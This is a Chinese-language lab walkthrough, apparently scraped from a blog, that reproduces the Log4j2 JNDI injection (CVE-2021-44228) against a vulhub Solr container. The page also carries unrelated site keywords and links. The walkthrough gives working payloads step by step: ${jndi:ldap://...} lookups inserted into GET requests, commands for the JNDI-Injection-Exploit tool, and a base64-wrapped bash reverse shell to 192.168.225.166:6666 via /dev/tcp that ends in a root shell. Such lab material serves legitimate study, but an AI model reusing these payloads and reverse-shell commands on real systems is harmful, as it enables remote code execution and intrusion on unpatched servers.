当前位置: 首页 > news >正文

云平台建设网站手机版网站系统

云平台建设网站,手机版网站系统,快音,做网站代理去拉人Apache_Log4j2查找功能JNDI注入_CVE-2021-44228 文章目录 Apache_Log4j2查找功能JNDI注入_CVE-2021-442281 在线漏洞解读:2 环境搭建3 影响版本#xff1a;4 漏洞复现4.1 访问页面4.2 poc漏洞验证 4.3 在dnslog获取个域名4.4 使用bp抓包进行分析4.5 通信成功#xff0c;此处可…Apache_Log4j2查找功能JNDI注入_CVE-2021-44228 文章目录 Apache_Log4j2查找功能JNDI注入_CVE-2021-442281 在线漏洞解读:2 环境搭建3 影响版本4 漏洞复现4.1 访问页面4.2 poc漏洞验证 4.3 在dnslog获取个域名4.4 使用bp抓包进行分析4.5 通信成功此处可以漏洞利用 5 构建一个imr服务器5.1 java通信协议5.2 下载工具JNDI协议服务5.3 执行漏洞核心指令 6 kali进行下载安裝JNDI服务6.1 使用编译好的tar包准备启动JNDI通信服务6.2 执行6.3 将下面请求依次放到bp--》漏洞请求参数中6.4 查看docker容器6.5 docker容器中成功创建文件test命令执行成功 7 构建反弹shell7.1 反弹shell一句话7.2 使用在线工具转义7.3 开启监听7.4 重新启动 JNDI服务,并将开启shell连接一句话放到 -C “command”中7.5 将扫描到的紫色标记连接地址-替换到下图红框中进行转发7.6 请求后JNDI服务收到请求响应7.7 经过多次尝试获取连接取得shell获取root 1 在线漏洞解读: https://vulhub.org/#/environments/log4j/CVE-2021-44228/2 环境搭建 cd /home/kali/vulhub/log4j/CVE-2021-44228启动 sudo docker-compose up -dsudo docker-compose ps -a sudo docker ps -a已启动访问端口8900 3 影响版本 ​ Log4j2 4 漏洞复现 4.1 访问页面 ​ 访问页面http://192.168.225.166:8900/ 4.2 poc漏洞验证 简单地说输入有效负载${jndi:dns://${sys:java.version}.example.com}可以触发JNDI查询的管理操作。 GET /solr/admin/cores?action${jndi:ldap://${sys:java.version}.example.com} HTTP/1.1 Host: your-ip:8983 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Connection: close4.3 在dnslog获取个域名 http://dnslog.cn/4.4 使用bp抓包进行分析 将域名地址放入下图中send转发看是否可以通信 GET /solr/admin/cores?action${jndi:ldap://${sys:java.version}.qlsfi0.dnslog.cn} HTTP/1.14.5 通信成功此处可以漏洞利用 5 构建一个imr服务器 5.1 java通信协议 JNDIJava Nameing and Directory InterfaceJava 命令与目录接口是一组应用程序接口目的是为了方便查找远程或本地对象。JNDI 典型的应用场景是配置数据源除此之外JNDI 还可以访问现有的目录和服务例如LDAP| RMI| CORBA| DNS| NDS| NIS5.2 下载工具JNDI协议服务 https://github.com/welk1n/JNDI-Injection-Exploit5.3 执行漏洞核心指令 $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]要确保 1099、1389、8180端口可用不被其他程序占用6 kali进行下载安裝JNDI服务 ┌──(kalikali)-[~/tools] └─$ proxychains git clone https://github.com/welk1n/JNDI-Injection-Exploit.git 6.1 使用编译好的tar包准备启动JNDI通信服务 ┌──(kalikali)-[~/tools/java-unserialize/JNDI-Injection-Exploit/target] └─$ pwd /home/kali/tools/java-unserialize/JNDI-Injection-Exploit/target6.2 执行 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C touch /tmp/test -A 192.168.225.1666.3 将下面请求依次放到bp–》漏洞请求参数中 rmi://192.168.225.166:1099/zn7ifc ldap://192.168.225.166:1389/zn7ifc rmi://192.168.225.166:1099/cv02m1 rmi://192.168.225.166:1099/jxyhcp ldap://192.168.225.166:1389/jxyhcp GET /solr/admin/cores?action${jndi:ldap://192.168.225.166:1389/zn7ifc} HTTP/1.1kali后台 6.4 查看docker容器 sudo docker ps -a sudo docker exec -it d63fc660cd63 /bin/bash6.5 docker容器中成功创建文件test命令执行成功 7 构建反弹shell 7.1 反弹shell一句话 nc -lvvp 6666 # 开启监听6666端口服务 ---------------------------------- bash -i /dev/tcp/192.168.225.166/6666 01 ---------------------------------- bash -i /dev/tcp/192.168.225.166/6666 01 转成base64位YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjIyNS4xNjYvNjY2NiAwPiYx ---------------------------------- bash -c {echo,base64编码一句话shell}|{base64,-d}|{bash,-i} -------------- 最后组合为 bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjIyNS4xNjYvNjY2NiAwPiYx}|{base64,-d}|{bash,-i} ----------------------------------输入java指令 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjIyNS4xNjYvNjY2NiAwPiYx}|{base64,-d}|{bash,-i} -A 192.168.225.166bash -i /dev/tcp/192.168.225.166/6666 01 # 反弹交互指令tcp服务 nc -lvp 6666 # l是监听模式v是显示详细信息p是指定端口7.2 使用在线工具转义 7.3 开启监听 nc -lvvp 66667.4 重新启动 JNDI服务,并将开启shell连接一句话放到 -C “command”中 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjIyNS4xNjYvNjY2NiAwPiYx}|{base64,-d}|{bash,-i} -A 192.168.225.1667.5 将扫描到的紫色标记连接地址-替换到下图红框中进行转发 rmi://192.168.225.166:1099/i3hcpf rmi://192.168.225.166:1099/w7eudo ldap://192.168.225.166:1389/w7eudo rmi://192.168.225.166:1099/vlvzc3 ldap://192.168.225.166:1389/vlvzc37.6 请求后JNDI服务收到请求响应 7.7 经过多次尝试获取连接取得shell获取root
http://www.sadfv.cn/news/236985/

相关文章:

  • win7怎么更新wordpressseo网站提交
  • 生物信息网站建设企业电子邮箱怎么注册
  • 自己做一个外贸网站怎么样建设网站运营方案
  • 电商网站设计规范北京制作网站的公司简介
  • 郴州做网站 郴网互联淘宝的网站建设怎么建
  • 松原网站建设公司房地产网站开发公司电话
  • 阿图什网站有道网站收录提交入口
  • 郑州市网站建设公司七牛云做网站
  • 重庆网站建设网站制作wordpress换菜单样式
  • 网站服务器一个多少钱河南有名的做网站公司
  • 枣庄市网站建设杭州外贸网站建设公司申跃
  • win7网站后台无法编辑现在网站后台有哪几种模板形式
  • 婚庆公司网站源码云渲染网站开发
  • 如何做网站链接无锡网站制作系统
  • 海口网站制作案例网页游戏排行榜前十名2023
  • 网站页脚设计的几个小技巧石家庄发布最新公告
  • 百容千域可以免费做网站吗作文网址
  • 深圳市工程建设造价网站工程建设项目招标
  • 北京品牌建设网站无法打开建设银行企业网站
  • 网站推广最有效的方法西安网站建设网站制作
  • 刘家窑网站建设公司找房网58同城买房
  • 怎么做盈利的网站绍兴网站建设方案策划
  • 临沂做网站企业如何来建设网站
  • 剑网三奇遇查询网站怎么做wordpress删除分类
  • 网站开发 语音输入网站创建域名
  • 怎么自己做淘客网站新编asp.net 2.0网站开发从入门到精通 代码
  • 最新的销售平台seo优化是指通过研究搜索引擎排名规则
  • 滕州网站建设建设网站的效益分析
  • 本地门户网站源码wordpress 蓝色企业主题
  • 禹城网站建设价格菏泽网站建设价格